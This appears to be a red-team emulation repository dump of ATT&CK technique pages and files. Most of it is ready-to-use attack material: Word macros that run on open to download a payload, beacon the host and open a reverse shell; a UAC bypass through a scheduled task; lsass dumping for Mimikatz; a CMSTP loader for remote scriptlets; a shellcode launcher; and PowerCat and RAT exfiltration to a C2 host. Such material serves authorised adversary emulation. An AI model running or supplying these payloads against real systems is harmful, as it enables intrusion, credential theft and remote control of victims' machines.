├── Techniques ├── T1104 │ └── T1104.md ├── T1216 │ ├── cmd.txt │ ├── shellcode.cs │ └── T1216.md ├── T1186 │ ├── proc_doppel.zip │ └── T1186.md ├── T1223 │ └── T1223.md ├── T1191 │ ├── T1191.inf │ ├── T1191.md │ └── T1191.sct ├── T1192 │ └── T1192.md ├── T1088 │ └── T1088.md ├── T1197 │ └── T1197.md ├── T1053 │ └── T1053.md ├── T1003 │ └── T1003.md ├── T1118 │ └── T1118.md ├── T1155 │ └── T1155.md ├── T1041 │ └── T1041.md ├── T1219 │ ├── T1219.md │ ├── FileHandler.cs │ └── Program.cs ├── T1059 │ └── T1059.md ├── T1086 │ └── T1086.md ├── T1221 │ └── T1221.md └── T1085 │ └── T1085.md ├── README.md └── matrix.md /Techniques/T1104/T1104.md: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Techniques/T1216/cmd.txt: -------------------------------------------------------------------------------- 1 | code = ""; 2 | o.Run(code); 3 | -------------------------------------------------------------------------------- /Techniques/T1186/proc_doppel.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/brianwrf/RTEmulation/HEAD/Techniques/T1186/proc_doppel.zip -------------------------------------------------------------------------------- /Techniques/T1223/T1223.md: -------------------------------------------------------------------------------- 1 | # Compiled HTML File 2 | 3 | --- 4 | * **ID**: T1223 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | # References 11 | 12 | * 13 | * 14 | -------------------------------------------------------------------------------- /Techniques/T1191/T1191.inf: -------------------------------------------------------------------------------- 1 | [version] 2 | Signature=$chicago$ 3 | AdvancedINF=2.5 4 | 5 | [DefaultInstall_SingleUser] 6 | UnRegisterOCXs=UnRegisterOCXSection 7 | 8 | [UnRegisterOCXSection] 9 | 
%11%\scrobj.dll,NI,https://github.com/brianwrf/RTEmulation/raw/master/Techniques/T1191/T1191.sct 10 | 11 | [Strings] 12 | AppAct = "SOFTWARE\Microsoft\Connection Manager" 13 | ServiceName="T1191" 14 | ShortSvcName="T1191" 15 | -------------------------------------------------------------------------------- /Techniques/T1192/T1192.md: -------------------------------------------------------------------------------- 1 | # Spearphishing Link 2 | 3 | --- 4 | * **ID**: T1192 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Use 3rd party trusted storage services for malware 11 | * Amazon Cloud Drive: 12 | * Google Drive: 13 | * Dropbox: 14 | * Github: 15 | * Pastebin: 16 | * Mega: 17 | 18 | # References 19 | 20 | * 21 | * 22 | * 23 | -------------------------------------------------------------------------------- /Techniques/T1088/T1088.md: -------------------------------------------------------------------------------- 1 | # Bypass User Account Control 2 | 3 | --- 4 | * **ID**: T1088 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Exploit environment variables in Scheduled Task for User Account Control (UAC) bypass 11 | 12 | ``` 13 | reg add HKCU\Environment /v windir /d "rundll32 %APPDATA%\temp.txt,DllMain " /f&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I & reg delete HKCU\Environment /v windir /f 14 | ``` 15 | 16 | # References 17 | 18 | * 19 | * 20 | * 21 | * 22 | -------------------------------------------------------------------------------- /Techniques/T1197/T1197.md: -------------------------------------------------------------------------------- 1 | # BITS Jobs 2 | 3 | --- 4 | * **ID**: T1197 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## BITSAdmin 11 | Download a payload leveraging BITSAdmin: 12 | ``` 13 | bitsadmin.exe /transfer txt /download /priority normal http://example.com/example.exe %ALLUSERSPROFILE%\example.exe 14 | ``` 15 | 16 | ## PowerShell 17 | Download a payload leveraging PowerShell: 18 | ``` 19 | 
powershell 20 | Start-BitsTransfer -Priority foreground -Source http://example.com/example.exe -Destination C:\ClientDir\example.exe 21 | ``` 22 | 23 | # References 24 | 25 | * 26 | * 27 | * 28 | * 29 | -------------------------------------------------------------------------------- /Techniques/T1191/T1191.md: -------------------------------------------------------------------------------- 1 | # CMSTP 2 | 3 | --- 4 | * **ID**: T1191 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Execute 11 | Silently installs a specially formatted local .INF (e.g. [`T1191.inf`](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1191/T1191.inf)) without creating a desktop icon. The .INF file contains an `UnRegisterOCXSection` section which executes a .SCT (e.g. [`T1191.sct`](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1191/T1191.sct)) file using `scrobj.dll`. 12 | ``` 13 | cmstp.exe /ni /ns /s C:\ClientDir\T1191.inf 14 | ``` 15 | * Usecase: Execute code hidden within an .INF file. Download and run scriptlets from the internet. 16 | * Privileges required: User 17 | * OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 18 | 19 | # References 20 | 21 | * 22 | * 23 | * 24 | -------------------------------------------------------------------------------- /Techniques/T1053/T1053.md: -------------------------------------------------------------------------------- 1 | # Scheduled Task 2 | 3 | --- 4 | * **ID**: T1053 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## schtasks 11 | 12 | * Create a scheduled task, e.g. 
Create a scheduled task run as SYSTEM with highest privilege and no password: 13 | ``` 14 | SCHTASKS /CREATE /SC HOURLY /TN GoogleUpdateTaskMachine /TR "rundll32 %APPDATA%\qwer.txt,DllMain" /NP /RU SYSTEM /RL HIGHEST 15 | SCHTASKS /CREATE /SC DAILY /ST 13:00 /TN \Microsoft\Windows\Feedback\Siuf\DMClientOnScenarioCleanUp /TR "rundll32 %APPDATA%\temp.txt,DllMain" /NP /RU SYSTEM /RL HIGHEST 16 | ``` 17 | 18 | * Run a scheduled task 19 | ``` 20 | schtasks /run /tn GoogleUpdateTaskMachine /I 21 | schtasks /run /tn \Microsoft\Windows\Feedback\Siuf\DMClientOnScenarioCleanUp /I 22 | ``` 23 | 24 | * Delete a scheduled task 25 | ``` 26 | schtasks /delete /tn GoogleUpdateTaskMachine /F 27 | schtasks /delete /tn \Microsoft\Windows\Feedback\Siuf\DMClientOnScenarioCleanUp /F 28 | ``` 29 | 30 | # References 31 | 32 | * 33 | -------------------------------------------------------------------------------- /Techniques/T1003/T1003.md: -------------------------------------------------------------------------------- 1 | # Credential Dumping 2 | 3 | --- 4 | * **ID**: T1003 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## ProcDump and Mimikatz 11 | * Download `ProcDump` to victim host: 12 | ``` 13 | powershell Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile %ALLUSERSPROFILE%\Procdump.zip 14 | ``` 15 | * Decompress `Procdump.zip` on victim host 16 | * Dump process memory of lsass.exe (dump using a clone) on victim host: 17 | ``` 18 | %ALLUSERSPROFILE%\procdump.exe -accepteula -ma lsass.exe lsass.dmp -r 19 | ``` 20 | * Exfiltrate the dump file `lsass.dmp` to attacker host 21 | * Run Mimikatz (x64/mimikatz.exe) on attacker host to grab clear-text passwords: 22 | * Run [Mimikatz](https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20190512/mimikatz_trunk.zip) 23 | * Type `sekurlsa::Minidump lsass.dmp` 24 | * Type `sekurlsa::logonPasswords` 25 | 26 | # References 27 | 28 | * 29 | * 30 | 
-------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Description 2 | 3 | This is a repository for Red Team emulation based on MITRE ATT&CK. 4 | 5 | # How to Use 6 | 7 | * See the [Matrix](https://github.com/brianwrf/RTEmulation/blob/master/matrix.md) page. 8 | 9 | # How to Contribute 10 | 11 | * Create a subfolder named with the technique ID (e.g. [T1053](https://github.com/brianwrf/RTEmulation/tree/master/Techniques/T1053)) under the [Techniques](https://github.com/brianwrf/RTEmulation/tree/master/Techniques) folder; 12 | * Create a file named with the technique ID (e.g. [T1053.md](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1053/T1053.md)) under the subfolder created in the last step; 13 | * Add the technique details to the .md file created in the last step, using the template shown below: 14 | 15 | ``` 16 | # Technique Name 17 | 18 | --- 19 | * **ID**: T1053 20 | * **Source**: 21 | --- 22 | 23 | # Details 24 | 25 | # References 26 | 27 | * 28 | ``` 29 | 30 | * Update the [Matrix](https://github.com/brianwrf/RTEmulation/blob/master/matrix.md) page with the technique name (including the link) under the specific tactic. 31 | 32 | # References 33 | * 34 | -------------------------------------------------------------------------------- /Techniques/T1118/T1118.md: -------------------------------------------------------------------------------- 1 | # InstallUtil 2 | 3 | --- 4 | * **ID**: T1118 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Execute 11 | Execute the target .NET DLL or EXE. 
12 | ``` 13 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll 14 | ``` 15 | * Usecase: Use to execute code 16 | * Privileges required: User 17 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 18 | 19 | ## Application whitelisting (AWL) bypass 20 | Execute the target .NET DLL or EXE. 21 | ``` 22 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.exe 23 | ``` 24 | * Usecase: Use to bypass application whitelisting 25 | * Privileges required: User 26 | * OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 27 | 28 | ## Create a EXE file for InstallUtil 29 | * See [Remote Access Tools](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1219/T1219.md) 30 | 31 | # References 32 | 33 | * 34 | * 35 | -------------------------------------------------------------------------------- /Techniques/T1155/T1155.md: -------------------------------------------------------------------------------- 1 | # AppleScript 2 | 3 | --- 4 | * **ID**: T1155 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | * Create a Word document, see [Template Injection](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1221/T1221.md) 11 | * Create a macro in VB with the codes below: 12 | 13 | ``` 14 | Sub Auto_Open() 15 | OpenMe 16 | End Sub 17 | 18 | Sub AutoOpen() 19 | OpenMe 20 | End Sub 21 | 22 | Sub AutoNew() 23 | OpenMe 24 | End Sub 25 | 26 | Sub Document_Open() 27 | OpenMe 28 | End Sub 29 | 30 | Public Function OpenMe() As Variant 31 | On Error Resume Next 32 | Dim cmd As String 33 | cmd = "do shell script ""curl http:///`whoami`/`hostname` & python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\""\"",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' & """ 34 | MacScript (cmd) 35 | End Function 36 | ``` 37 | 
38 | # References 39 | 40 | * 41 | * 42 | -------------------------------------------------------------------------------- /Techniques/T1191/T1191.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /Techniques/T1041/T1041.md: -------------------------------------------------------------------------------- 1 | # Exfiltration Over Command and Control Channel 2 | 3 | --- 4 | * **ID**: T1041 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## PowerCat 11 | * Load PowerCat in command line on victim host: 12 | ``` 13 | powershell 14 | IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1') 15 | ``` 16 | * Start a listener on C2 host: 17 | ``` 18 | nc -lvvp > out.file 19 | ``` 20 | * Transfer local files to remote C2 host using `PowerCat`: 21 | ``` 22 | powercat -c -p -i 23 | ``` 24 | 25 | ## RAT 26 | ### Customized Aresskit 27 | * [Deploy](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1219/T1219.md) customized `aresskit` to victim host 28 | * Transfer local files to C2 host: 29 | * Start a listener on C2 host: 30 | ``` 31 | nc -lvvp > out.file 32 | ``` 33 | * Transfer local files to remote host using `aresskit`: 34 | ``` 35 | aresskit> FileHandler::uploadFileNew 36 | ``` 37 | 38 | # References 39 | 40 | * 41 | * 42 | -------------------------------------------------------------------------------- /Techniques/T1219/T1219.md: -------------------------------------------------------------------------------- 1 | # Remote Access Tools 2 | 3 | --- 4 | * **ID**: T1219 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Customized RAT 11 | ### Create customized Aresskit 12 | * Download the source code from [Github](https://github.com/BlackVikingPro/aresskit) 13 | * Replace with 
[Program.cs](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1219/Program.cs) and modify all `` and `` accordingly 14 | * Replace with [FileHandler.cs](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1219/FileHandler.cs) 15 | * Compile the program using `Debug` - `Any CPU` 16 | * Copy file `aresskit.exe` under folder `.\aresskit\bin\Debug` and upload it to your C2 host 17 | 18 | ### Use customized Aresskit 19 | * Start a listener on C2 host: 20 | ``` 21 | nc -lvvp 22 | ``` 23 | * Download and execute `aresskit.exe` on the victim host by leveraging [`InstallUtil`](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1118/T1118.md): 24 | ``` 25 | powershell Invoke-WebRequest -Uri "http:///aresskit.exe" -OutFile %ALLUSERSPROFILE%\aresskit.exe & C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U %ALLUSERSPROFILE%\aresskit.exe 26 | ``` 27 | 28 | # References 29 | 30 | * 31 | * 32 | * 33 | -------------------------------------------------------------------------------- /Techniques/T1216/shellcode.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Runtime.InteropServices; 7 | 8 | /* 9 | Author: Casey Smith, Twitter: @subTee 10 | License: BSD 3-Clause 11 | */ 12 | 13 | namespace ShellCodeLauncher 14 | { 15 | public class Program 16 | { 17 | 18 | public void Run(string scode) 19 | { 20 | byte[] shellcode = Convert.FromBase64String(scode); 21 | 22 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, 23 | MEM_COMMIT, PAGE_EXECUTE_READWRITE); 24 | Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); 25 | IntPtr hThread = IntPtr.Zero; 26 | UInt32 threadId = 0; 27 | // prepare data 28 | 29 | IntPtr pinfo = IntPtr.Zero; 30 | 31 | // execute native code 32 | 33 | hThread = CreateThread(0, 
0, funcAddr, pinfo, 0, ref threadId); 34 | WaitForSingleObject(hThread, 0xFFFFFFFF); 35 | return; 36 | } 37 | 38 | private static UInt32 MEM_COMMIT = 0x1000; 39 | 40 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 41 | 42 | [DllImport("kernel32")] 43 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, 44 | UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 45 | 46 | 47 | [DllImport("kernel32")] 48 | private static extern IntPtr CreateThread( 49 | 50 | UInt32 lpThreadAttributes, 51 | UInt32 dwStackSize, 52 | UInt32 lpStartAddress, 53 | IntPtr param, 54 | UInt32 dwCreationFlags, 55 | ref UInt32 lpThreadId 56 | 57 | ); 58 | 59 | [DllImport("kernel32")] 60 | private static extern UInt32 WaitForSingleObject( 61 | 62 | IntPtr hHandle, 63 | UInt32 dwMilliseconds 64 | ); 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /Techniques/T1059/T1059.md: -------------------------------------------------------------------------------- 1 | # Command-Line Interface 2 | 3 | --- 4 | * **ID**: T1059 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Common commands in Windows CLI 11 | ### System Information 12 | * Check system info: `systeminfo` 13 | * Check IP info: `ipconfig /all` 14 | * Check current user: `whoami` 15 | * Check host name: `hostname` 16 | * Check local users: `net user` 17 | * Check local groups: `net localgroup` 18 | * Check all the networked devices: `net view` 19 | * Check local shares: `net share` 20 | * Check process info: `tasklist` 21 | 22 | ### File 23 | * Search local files: `cd c:\ & dir /b /s ` 24 | * Check file content: `type ` 25 | * Download a remote file: 26 | * BITSAdmin: `bitsadmin.exe /transfer txt /download /priority normal http://example.com/example.exe %ALLUSERSPROFILE%\example.exe` 27 | * PowerShell: `powershell Invoke-WebRequest -Uri "http://example.com/example.exe" -OutFile %ALLUSERSPROFILE%\example.exe` 28 | 29 | ### Service 30 | * Create a service: `sc create 
ExampleService binPath= "F:\Delete\SampleSolution\Sample\WindowsServiceExample\bin\Debug\WindowsServiceExample.exe"` 31 | * Start a service: `sc start ExampleService` 32 | * Stop a service: `sc stop ExampleService` 33 | * Delete a service: `sc delete ExampleService` 34 | 35 | ### Scheduled Task 36 | * Create/run/delete a scheduled task: see [Scheduled Task](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1053/T1053.md) 37 | 38 | ### Registry 39 | * Add a registry key: `reg add HKCU\Environment /v windir /d "calc.exe" /f` 40 | * Delete a registry key: `reg delete HKCU\Environment /v windir /f` 41 | 42 | ### Firewall 43 | * Check the status of Windows Firewall: `netsh advfirewall show allprofiles` 44 | * Turn on Windows Firewall: `netsh advfirewall set allprofiles state on` 45 | * Turn off Windows Firewall: `netsh advfirewall set allprofiles state off` 46 | 47 | # References 48 | 49 | * 50 | * 51 | -------------------------------------------------------------------------------- /Techniques/T1086/T1086.md: -------------------------------------------------------------------------------- 1 | # PowerShell 2 | 3 | --- 4 | * **ID**: T1086 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Tools 11 | ### Empire 12 | * Install `Docker` on your C2 host 13 | * Edit `~/.bashrc` to add the following aliases: 14 | ``` 15 | # Empire docker command 16 | alias empire_start='docker exec -it $(docker run -d -p 80:80 empireproject/empire) python2.7 empire' 17 | alias empire_stop='docker kill $(docker ps | grep empire | cut -d " " -f 1)' 18 | ``` 19 | * Run the command below to make the aliases take effect: 20 | ``` 21 | source ~/.bashrc 22 | ``` 23 | * Execute the following commands to start/stop your `Empire` containers: 24 | * Start `Empire` container: `empire_start` 25 | * Stop `Empire` container: `empire_stop` 26 | 27 | ### Invoke-Obfuscation 28 | * Install [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) 29 | * Import module and run 
it to obfuscate the PowerShell script block as following: 30 | ``` 31 | Import-Module ./Invoke-Obfuscation.psd1 32 | Invoke-Obfuscation 33 | set scriptblock powershell Invoke-WebRequest -Uri "http://example.com/example.dll" -OutFile %ALLUSERSPROFILE%\example.dll;Set-ItemProperty -Path "HKCU:\Environment" -Name 'windir' -Value 'rundll32 %ALLUSERSPROFILE%\example.dll,DllMain ' -Force;schtasks.exe /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I;Remove-ItemProperty -Path "HKCU:\Environment" -Name 'windir' -Force 34 | Encoding\5 35 | Compress\1 36 | Launcher\PS\7 37 | clip 38 | ``` 39 | 40 | ### PowerCat 41 | * See [Exfiltration Over Command and Control Channel](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1041/T1041.md) 42 | 43 | ## Common tips 44 | ### PowerShell Base64 encode 45 | ``` 46 | powershell 47 | $cmd = 'Invoke-WebRequest -Uri "http://example.com/example.exe" -OutFile C:\ClientDir\example.exe'; 48 | $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd); 49 | $encodedCommand = [Convert]::ToBase64String($bytes); 50 | $psh = "powershell -noP -sta -w 1 -enc "+$encodedCommand; 51 | Write-Output $psh 52 | ``` 53 | 54 | # References 55 | 56 | * 57 | * 58 | * 59 | -------------------------------------------------------------------------------- /Techniques/T1221/T1221.md: -------------------------------------------------------------------------------- 1 | # Template Injection 2 | 3 | --- 4 | * **ID**: T1221 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Create a Word template (.dotm) 11 | * Open Word and make the `Developer` tab on the ribbon visible 12 | * Open up the `Visual Basic` editor from `Developer` tab 13 | * Double-click on `ThisDocument` under the current project to open up the code window 14 | * Copy and paste the following macro code into the window 15 | 16 | ``` 17 | Sub Auto_Open() 18 | OpenMe 19 | End Sub 20 | 21 | Sub AutoOpen() 22 | OpenMe 23 | End Sub 24 | 25 | Sub AutoNew() 26 | OpenMe 27 | End Sub 28 | 29 | 
Sub Document_Open() 30 | OpenMe 31 | End Sub 32 | 33 | Public Function OpenMe() As Variant 34 | On Error Resume Next 35 | Dim hello As String 36 | hello = "cmd.exe /c c:\windows\system32\bitsadmin.exe /transfer txt /download /priority normal http:///dog.png %ALLUSERSPROFILE%\temp.txt® add HKCU\Environment /v windir /d ""rundll32 %ALLUSERSPROFILE%\temp.txt,DllMain "" /f&schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I & reg delete HKCU\Environment /v windir /f" 37 | Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") 38 | Set objStartup = objWMIService.Get("Win32_ProcessStartup") 39 | Set objConfig = objStartup.SpawnInstance_ 40 | objConfig.ShowWindow = 0 41 | Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") 42 | objProcess.Create hello, Null, objConfig, intProcessID 43 | 44 | Dim cmd As String 45 | cmd = "do shell script ""curl http:///`whoami`/`hostname` & python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\""\"",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\""/bin/sh\"",\""-i\""]);' & """ 46 | MacScript (cmd) 47 | End Function 48 | ``` 49 | 50 | * Save the template as `.dotm` format 51 | 52 | ## Create a Word file (.docx) with remote template 53 | * Create a new Word document 54 | * Rename the extension of the document to `.zip` 55 | * Unzip the file 56 | * Navigate to the `.\word\_rels\` folder and open up file `settings.xml.rels` 57 | * Change the `Target` value to be a remote location of template, e.g. 
`http:///template.dotm` 58 | * Zip the contents back up and rename the file back to a `.docx` file 59 | 60 | # References 61 | 62 | * 63 | * 64 | -------------------------------------------------------------------------------- /Techniques/T1219/FileHandler.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Net; 3 | using System.Net.Sockets; 4 | 5 | 6 | namespace aresskit 7 | { 8 | class FileHandler 9 | { 10 | public static bool downloadFile(string filename, string url) 11 | { 12 | using (WebClient client = new WebClient()) 13 | { 14 | try 15 | { 16 | client.DownloadFile(url, filename); 17 | } 18 | catch (WebException) 19 | { 20 | return false; 21 | } 22 | // File downloaded 23 | return true; 24 | } 25 | } 26 | 27 | public static string uploadFile(string filename, string url) 28 | { 29 | using (WebClient client = new WebClient()) 30 | { 31 | try 32 | { 33 | byte[] responseArray = client.UploadFile(url, filename); 34 | return System.Text.Encoding.ASCII.GetString(responseArray); 35 | } 36 | catch (WebException) 37 | { 38 | return "Upload failed"; 39 | } 40 | // File uploaded 41 | } 42 | } 43 | 44 | public string uploadFileNew(string cmdstr) 45 | { 46 | TcpClient client; 47 | string output = "Please type command as: 'FileHandler::uploadFileNew filename server port'"; 48 | try 49 | { 50 | if (cmdstr == null) 51 | { 52 | return output; 53 | } 54 | else 55 | { 56 | client = new TcpClient(); 57 | string[] paramData = cmdstr.Split(new char[] { ' ' }); 58 | string filename = paramData[0]; 59 | string server = paramData[1]; 60 | int port = Int32.Parse(paramData[2]); 61 | client.Connect(server, port); 62 | 63 | client.Client.SendFile(filename); 64 | client.Client.Shutdown(SocketShutdown.Both); 65 | client.Client.Close(); 66 | } 67 | } 68 | catch (WebException) 69 | { 70 | return output; 71 | } 72 | // File uploaded 73 | return "File uploaded with success!"; 74 | } 75 | } 76 | } 77 | 
-------------------------------------------------------------------------------- /Techniques/T1186/T1186.md: -------------------------------------------------------------------------------- 1 | # Process Doppelgänging 2 | 3 | --- 4 | * **ID**: T1186 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## Execute 11 | * Download PE files from [GitHub](https://github.com/brianwrf/RTEmulation/raw/master/Techniques/T1186/proc_doppel.zip) 12 | * Unzip `proc_doppel.zip` 13 | * Execute a payload with the following commands: 14 | * For the `x86` platform: `proc_doppel32.exe [*target_path], e.g. proc_doppel32.exe mimikatz.exe C:\Windows\system32\notepad.exe` 15 | * For the `x64` platform: `proc_doppel64.exe [*target_path], e.g. proc_doppel64.exe mimikatz.exe C:\Windows\system32\notepad.exe` 16 | 17 | ## How to build a PE (x86/x64) for Process Doppelgänging 18 | * Install [CMake](https://cmake.org/) (3.15.1+) and [Visual Studio](https://visualstudio.microsoft.com/vs/older-downloads/) 2016 or higher (select the `Visual C++` option) on Windows 19 | * Download the source code from [GitHub](https://github.com/hasherezade/process_doppelganging) 20 | * Open cmake-gui 21 | * In `Where is the source code`, enter the path of the project folder where the `CMakeLists.txt` is located, e.g. `C:/Users/test/Downloads/process_doppelganging` 22 | * In `Where to build the binaries`, enter the previous path and add: `/build`, e.g. 
`C:/Users/test/Downloads/process_doppelganging/build` 23 | * Click on the `Configure` button 24 | * A dialog window asks you if CMake can create the `build` folder, say `yes` 25 | * Another dialog window will ask you to specify a generator for your project, choose `Visual Studio` you installed 26 | * In `Optional platform for generator`, choose proper platform and click on `Finish`: 27 | * For `x86` platform, choose `Win32` 28 | * For `x64` platform, choose `x64` 29 | * CMake may take a few seconds to configure the project 30 | * Click on the `Generate` button to build the Visual Studio project files 31 | * Click on `Open Project` button to open the project in Visual Studio 32 | * Modify the code if you need (optional) 33 | * Set the project in `Release` mode with selected platform (`Win32` or `x64`) and build the PE file under path `./build/Release`, e.g. `C:/Users/test/Downloads/process_doppelganging/build/Release` 34 | 35 | # References 36 | 37 | * 38 | * 39 | * 40 | * 41 | * 42 | * 43 | -------------------------------------------------------------------------------- /matrix.md: -------------------------------------------------------------------------------- 1 | # ATT&CK Tactics & Techniques for Red Team Emulation 2 | | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | 3 | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| 4 | | [Spearphishing Link](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1192/T1192.md) |[AppleScript](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1155/T1155.md) | [BITS Jobs](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1197/T1197.md) | [Scheduled Task](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1053/T1053.md)| [Template Injection](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1221/T1221.md) | 
[Credential Dumping](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1003/T1003.md) | | [AppleScript](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1155/T1155.md) | | [Exfiltration Over Command and Control Channel](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1041/T1041.md) | [Remote Access Tools](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1219/T1219.md) | 5 | | |[InstallUtil](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1118/T1118.md) | [Scheduled Task](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1053/T1053.md)| | [Bypass User Account Control](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1088/T1088.md) | | | | | | [Multi-Stage Channels](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1104/T1104.md) | 6 | | |[Rundll32](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1085/T1085.md) | | | [Signed Script Proxy Execution](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1216/T1216.md) | | | | | | | 7 | | |[PowerShell](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1086/T1086.md) | | |[Process Doppelgänging](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1186/T1186.md) | | | | | | | 8 | | |[Command-Line Interface](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1059/T1059.md) | | | [CMSTP](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1191/T1191.md) | | | | | | | 9 | | |[Signed Script Proxy Execution](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1216/T1216.md) | | | [Compiled HTML File](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1223/T1223.md) | | | | | | | 10 | | |[CMSTP](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1191/T1191.md) | | | | | | | | | | 11 | | |[Compiled HTML File](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1223/T1223.md) | | | | | | 
| | | | 12 | -------------------------------------------------------------------------------- /Techniques/T1216/T1216.md: -------------------------------------------------------------------------------- 1 | # Signed Script Proxy Execution 2 | 3 | --- 4 | * **ID**: T1216 5 | * **Source**: 6 | --- 7 | 8 | # Details 9 | 10 | ## pubprn.vbs 11 | ### Execute remote payload in JavaScript 12 | * OS: Windows 7 / Windows 2008 R2 (Version 6.1), Windows 8.1 / Windows 2012 R2 (Version 6.3), Windows 10 / Windows 2016 (Version 1607) 13 | * Methods: 14 | * Option 1: 15 | ``` 16 | C:\Windows\SysWOW64\CScript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http:///payload.sct 17 | ``` 18 | * Option 2: 19 | ``` 20 | C:\Windows\SysWOW64\CScript.exe /b C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http:///payload.sct 21 | ``` 22 | 23 | ### Create payload (.sct) in JavaScript for Meterpreter 24 | 25 | * Compile CSharp source code [`shellcode.cs`](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1216/shellcode.cs) to DLL: 26 | ``` 27 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -unsafe -platform:x86 -target:library shellcode.cs 28 | ``` 29 | * Generate a x86 shellcode in base64 format, e.g. 
